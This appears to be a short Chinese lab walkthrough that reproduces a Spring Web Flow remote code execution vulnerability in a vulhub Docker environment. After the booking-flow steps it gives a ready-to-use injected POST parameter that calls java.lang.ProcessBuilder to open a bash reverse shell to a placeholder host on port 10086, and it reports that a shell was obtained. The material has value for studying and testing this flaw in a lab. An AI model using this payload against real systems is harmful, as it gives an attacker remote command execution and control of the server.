首先进入漏洞环境

构造所需漏洞

docker-compose up -d

在浏览器中访问

首先访问http://your-ip:8080/login,用页面左边给出的任意一个账号/密码登录系统

然后访问id为1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了):

再点击确认“Confirm”

此时抓包,抓到一个POST数据包,我们向其中添加一个字段(也就是反弹shellPOC):

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/x.x.x.x/10086+0>%261")).start()=vulhub  

成功执行,获得shell

Logo

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐